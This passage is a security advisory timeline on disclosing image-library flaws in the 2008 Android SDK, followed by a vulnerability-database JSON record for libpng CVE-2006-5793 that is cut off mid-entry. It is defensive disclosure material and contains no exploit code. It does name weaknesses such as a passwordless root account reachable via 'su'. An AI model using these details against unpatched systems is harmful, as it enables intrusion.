2008-02-04: Core notifies the vendor that Android is using a vulnerable PNG processing library.
2008-02-08: Vendor acknowledges, invites Core to send any new findings and asks if all findings will be included in the advisory.
2008-02-12: Core responds to vendor that all security issues found will be included in the advisory; the date is subject to coordination.
2008-02-12: Vendor releases version m5-rc14 of the Android SDK. Core receives no notification.
2008-02-13: Core sends the vendor more malformed images, including GIF, PNG and BMP files. Only the BMP file affects the m5-rc14 release.
2008-02-20: Core sends to the vendor a new version of the advisory, including a BMP PoC that runs arbitrary ARM code, and informs the vendor that we noticed that the recent m5-rc14 release fixed the GIF and PNG bugs. Publication of CORE-2008-0124 has been rescheduled for February 27th, 2008.
2008-02-21: Vendor confirms that the GIF and PNG fixes have been released and provides an official statement to the "Vendor Section" of the advisory. A final review of the advisory is requested before its release. The vendor indicates that the Android SDK is still in development and stabilization won't happen until it gets closer to Alpha. Changes to fix the BMP issue are coming soon; priorities are given to issues listed in the public issue tracking system at http://code.google.com/p/android/issues.
2008-02-26: Core indicates that publication of CORE-2008-0124 has been moved to March 3rd 2008, asks if an estimated date for the BMP fix is available and if Core should file the reported and any future bugs in the public issue tracking page.
2008-02-29: Final draft version of advisory CORE-2008-0124 is sent to the vendor as requested. Core requests that any additional comments or statements be provided by noon March 3rd, 2008 (UTC-5).
2008-03-01: Vendor requests publication to be delayed one day in order to publish a new release of Android with a fix to the BMP issue.
2008-03-02: Core agrees to delay publication for one day.
2008-03-03: Vendor releases Android SDK m5-rc15, which fixes the BMP vulnerability. Vendor indicates that Android applications run with the credentials of an unprivileged user, which decreases the severity of the issues found.
2008-03-04: Further research by Alfredo Ortega reveals that although the vendor statement is correct, current versions of Android SDK ship with a passwordless root account. Unprivileged users with shell access can simply use the 'su' program to gain privileges.
2008-03-04: Advisory CORE-2008-0124 is published.
About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/.
About Core Security Technologies
Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.
Disclaimer
The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
GPG/PGP Keys
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-200611-0210", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg roelofs", "version": "1.2.7rc1" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg roelofs", "version": "1.2.5" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg 
roelofs", "version": "1.2.7" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg roelofs", "version": "1.2.3" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg roelofs", "version": "1.2.8" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg roelofs", "version": "1.2.6" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg roelofs", "version": "1.2.12" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg roelofs", "version": "1.2.11" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg roelofs", "version": "1.2.9" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "greg roelofs", "version": "1.2.10" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "greg roelofs", "version": "1.0.6" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "greg roelofs", "version": "1.2.4" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "greg roelofs", "version": "1.2.0" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "greg roelofs", "version": "1.0.8" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "greg roelofs", "version": "1.0.7" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "greg roelofs", "version": "1.2.2" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "greg roelofs", "version": "1.0.9" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "greg roelofs", "version": "1.2.1" }, { "model": "libpng", "scope": "eq", "trust": 0.8, "vendor": "png group", "version": "1.0.6 to 1.2.12 versions up to" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "v10.5.2" }, { "model": "mac os x server", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "v10.5.2" }, { "model": "asianux server", "scope": "eq", "trust": 0.8, "vendor": "cybertrust", "version": "2.0" }, { "model": "asianux server", "scope": "eq", "trust": 0.8, "vendor": 
"cybertrust", "version": "2.1" }, { "model": "asianux server", "scope": "eq", "trust": 0.8, "vendor": "cybertrust", "version": "3.0" }, { "model": "asianux server", "scope": "eq", "trust": 0.8, "vendor": "cybertrust", "version": "3.0 (x86-64)" }, { "model": "asianux server", "scope": "eq", "trust": 0.8, "vendor": "cybertrust", "version": "4.0" }, { "model": "asianux server", "scope": "eq", "trust": 0.8, "vendor": "cybertrust", "version": "4.0 (x86-64)" }, { "model": "turbolinux", "scope": "eq", "trust": 0.8, "vendor": "turbo linux", "version": "10_f" }, { "model": "turbolinux appliance server", "scope": "eq", "trust": 0.8, "vendor": "turbo linux", "version": "1.0 (hosting)" }, { "model": "turbolinux appliance server", "scope": "eq", "trust": 0.8, "vendor": "turbo linux", "version": "1.0 (workgroup)" }, { "model": "turbolinux appliance server", "scope": "eq", "trust": 0.8, "vendor": "turbo linux", "version": "2.0" }, { "model": "turbolinux desktop", "scope": "eq", "trust": 0.8, "vendor": "turbo linux", "version": "10" }, { "model": "turbolinux fuji", "scope": null, "trust": 0.8, "vendor": "turbo linux", "version": null }, { "model": "turbolinux multimedia", "scope": null, "trust": 0.8, "vendor": "turbo linux", "version": null }, { "model": "turbolinux personal", "scope": null, "trust": 0.8, "vendor": "turbo linux", "version": null }, { "model": "turbolinux server", "scope": "eq", "trust": 0.8, "vendor": "turbo linux", "version": "10" }, { "model": "turbolinux server", "scope": "eq", "trust": 0.8, "vendor": "turbo linux", "version": "10 (x64)" }, { "model": "turbolinux server", "scope": "eq", "trust": 0.8, "vendor": "turbo linux", "version": "8" }, { "model": "wizpy", "scope": null, "trust": 0.8, "vendor": "turbo linux", "version": null }, { "model": "home", "scope": null, "trust": 0.8, "vendor": "turbo linux", "version": null }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "2.1 (as)" }, { "model": "enterprise linux", 
"scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "2.1 (es)" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "2.1 (ws)" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "3 (as)" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "3 (es)" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "3 (ws)" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "4 (as)" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "4 (es)" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "4 (ws)" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "5 (server)" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "3.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "4.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "5.0 (client)" }, { "model": "linux advanced workstation", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "2.1" }, { "model": "rhel desktop workstation", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "5 (client)" }, { "model": "linux personal", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "8.2" }, { "model": "linux mandrake x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2007.0" }, { "model": "enterprise linux virtualization server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "linux desktop", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "1.0" }, { "model": "libpng3", "scope": "eq", "trust": 0.3, "vendor": "libpng", "version": "1.2.12" }, { 
"model": "linux enterprise server", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "multi network firewall", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "2.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "5.10" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "5.10" }, { "model": "server", "scope": "eq", "trust": 0.3, "vendor": "turbolinux", "version": "10.0x86" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "10.0" }, { "model": "libpng3", "scope": "eq", "trust": 0.3, "vendor": "libpng", "version": "1.2.11" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "rpath", "version": "1" }, { "model": "enterprise linux es ia64", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1" }, { "model": "corporate server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "4.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "9.0" }, { "model": "linux lts powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "6.06" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "5.10" }, { "model": "linux mandrake", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2006.0" }, { "model": "android software development kit m3-rc37a", "scope": null, "trust": 0.3, "vendor": "google", "version": null }, { "model": "ccs", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "libpng", "scope": "eq", "trust": 0.3, "vendor": "libpng", "version": "1.0.18" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "5.10" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "6.10" }, { "model": "linux personal", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.3" }, { "model": 
"open-enterprise-server", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.0" }, { "model": "personal", "scope": null, "trust": 0.3, "vendor": "turbolinux", "version": null }, { "model": "linux professional", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.0" }, { "model": "appliance server hosting edition", "scope": "eq", "trust": 0.3, "vendor": "turbolinux", "version": "1.0" }, { "model": "unitedlinux", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "1.0" }, { "model": "ccs", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.1.1" }, { "model": "hat enterprise linux as", "scope": "eq", "trust": 0.3, "vendor": "red", "version": "2.1" }, { "model": "desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4.0" }, { "model": "fuji", "scope": null, "trust": 0.3, "vendor": "turbolinux", "version": null }, { "model": "stable", "scope": null, "trust": 0.3, "vendor": "openpkg", "version": null }, { "model": "libpng3", "scope": "eq", "trust": 0.3, "vendor": "libpng", "version": "1.2.10" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "11.0" }, { "model": "hat enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "red", "version": "5" }, { "model": "operating system enterprise server", "scope": "eq", "trust": 0.3, "vendor": "trustix", "version": "2.0" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "6.06" }, { "model": "android software development kit m5-rc15", "scope": "ne", "trust": 0.3, "vendor": "google", "version": null }, { "model": "messaging storage server mm3.0", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "enterprise linux hardware certification", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux ws", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "enterprise linux ws", "scope": "eq", 
"trust": 0.3, "vendor": "redhat", "version": "3" }, { "model": "messaging storage server", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "advanced workstation for the itanium processor ia64", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "hat enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "red", "version": "5" }, { "model": "linux personal", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "6.10" }, { "model": "enterprise linux es", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "enterprise linux es", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "3" }, { "model": "hat enterprise linux as ia64", "scope": "eq", "trust": 0.3, "vendor": "red", "version": "2.1" }, { "model": "linux personal x86 64", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.3" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "6.10" }, { "model": "linux personal", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "10.1" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "6.06" }, { "model": "appliance server", "scope": "eq", "trust": 0.3, "vendor": "turbolinux", "version": "2.0" }, { "model": "ccs", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "6.10" }, { "model": "secure linux", "scope": "eq", "trust": 0.3, "vendor": "trustix", "version": "2.2" }, { "model": "e1.0-solid", "scope": null, "trust": 0.3, "vendor": "openpkg", "version": null }, { "model": "linux professional oss", "scope": "eq", "trust": 0.3, "vendor": "s u s e", 
"version": "10.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "8.1" }, { "model": "home", "scope": null, "trust": 0.3, "vendor": "turbolinux", "version": null }, { "model": "fuji", "scope": "eq", "trust": 0.3, "vendor": "turbolinux", "version": "0" }, { "model": "linux enterprise server", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9" }, { "model": "hat fedora core6", "scope": null, "trust": 0.3, "vendor": "red", "version": null }, { "model": "hat enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "red", "version": "5" }, { "model": "linux enterprise server", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "8" }, { "model": "linux mandrake", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2007.0" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.5.2" }, { "model": "linux professional x86 64", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.3" }, { "model": "secure linux", "scope": "eq", "trust": 0.3, "vendor": "trustix", "version": "3.0" }, { "model": "suse linux retail solution", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "8.0" }, { "model": "linux personal oss", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "10.0" }, { "model": "linux enterprise desktop", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "corporate server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "3.0" }, { "model": "message networking", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "linux personal x86 64", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "9.1" }, { "model": "linux professional", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "8.2" }, { "model": "linux lts sparc", "scope": "eq", 
"trust": 0.3, "vendor": "ubuntu", "version": "6.06" }, { "model": "corporate server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "4.0" }, { "model": "appliance server workgroup edition", "scope": "eq", "trust": 0.3, "vendor": "turbolinux", "version": "1.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "10.1" }, { "model": "messaging storage server mss", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "enterprise linux ws", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1" }, { "model": "enterprise linux desktop version", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "10.2" }, { "model": "linux professional", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.1" }, { "model": "enterprise linux es", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "suse linux standard server", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "8.0" }, { "model": "desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "3.0" }, { "model": "linux professional", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "10.1" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "linux professional x86 64", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.1" }, { "model": "desktop", "scope": "eq", "trust": 0.3, "vendor": "turbolinux", "version": "10.0" }, { "model": "ses", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "advanced workstation for the itanium processor", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1" }, { "model": "server", "scope": "eq", "trust": 0.3, 
"vendor": "turbolinux", "version": "10.0" }, { "model": "linux personal", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.2" }, { "model": "linux professional", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.3" }, { "model": "f...", "scope": "eq", "trust": 0.3, "vendor": "turbolinux", "version": "10" }, { "model": "ses", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.1.1" }, { "model": "linux personal", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.0" }, { "model": "linux mandrake x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2006.0" }, { "model": "message networking mn", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.1" }, { "model": "enterprise linux ws ia64", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.1.3" }, { "model": "broker ftp server", "scope": "eq", "trust": 0.3, "vendor": "transsoft", "version": "8.0" }, { "model": "propack sp6", "scope": "eq", "trust": 0.3, "vendor": "sgi", "version": "3.0" }, { "model": "novell linux desktop", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.0" }, { "model": "suse linux school server for i386", "scope": null, "trust": 0.3, "vendor": "s u s e", "version": null }, { "model": "multimedia", "scope": null, "trust": 0.3, "vendor": "turbolinux", "version": null }, { "model": "communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "current", "scope": null, "trust": 0.3, "vendor": "openpkg", "version": null }, { "model": "hat fedora core5", "scope": null, "trust": 0.3, "vendor": "red", "version": null }, { "model": "hat enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "red", "version": "5" }, { "model": "linux personal x86 64", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": 
"9.2" }, { "model": "2-stable-20061018", "scope": null, "trust": 0.3, "vendor": "openpkg", "version": null }, { "model": "enterprise linux desktop multi os client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "linux personal x86 64", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.0" }, { "model": "ses", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "corporate server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "3.0" }, { "model": "linux professional", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.2" }, { "model": "suse linux openexchange server", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "4.0" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.5.2" }, { "model": "server", "scope": "eq", "trust": 0.3, "vendor": "turbolinux", "version": "10.0.0x64" }, { "model": "communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0.1" }, { "model": "linux professional x86 64", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.2" }, { "model": "hat enterprise linux as", "scope": "eq", "trust": 0.3, "vendor": "red", "version": "4" }, { "model": "hat enterprise linux as", "scope": "eq", "trust": 0.3, "vendor": "red", "version": "3" }, { "model": "linux professional x86 64", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9.0" }, { "model": "enterprise linux optional productivity application server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" } ], "sources": [ { "db": "BID", "id": "21078" }, { "db": "JVNDB", "id": "JVNDB-2006-000961" }, { "db": "CNNVD", "id": "CNNVD-200611-295" }, { "db": "NVD", "id": "CVE-2006-5793" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", 
"children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.0.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.0.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.0.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.0.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.12:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.11:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.7:*:*:*:*:*:*:*", "cpe_name": 
[], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.7rc1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2006-5793" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Tavis Ormandy from the Gentoo Linux Security Auditing Team discovered this vulnerability.", "sources": [ { "db": "BID", "id": "21078" }, { "db": "CNNVD", "id": "CNNVD-200611-295" } ], "trust": 0.9 }, "cve": "CVE-2006-5793", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 2.6, "confidentialityImpact": "NONE", "exploitabilityScore": 4.9, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "trust": 1.0, "userInteractionRequired": true, "vectorString": "AV:N/AC:H/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "High", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 2.6, 
"confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2006-5793", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Low", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:H/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2006-5793", "trust": 1.8, "value": "LOW" }, { "author": "CNNVD", "id": "CNNVD-200611-295", "trust": 0.6, "value": "LOW" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2006-000961" }, { "db": "CNNVD", "id": "CNNVD-200611-295" }, { "db": "NVD", "id": "CVE-2006-5793" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The sPLT chunk handling code (png_set_sPLT function in pngset.c) in libpng 1.0.6 through 1.2.12 uses a sizeof operator on the wrong data type, which allows context-dependent attackers to cause a denial of service (crash) via 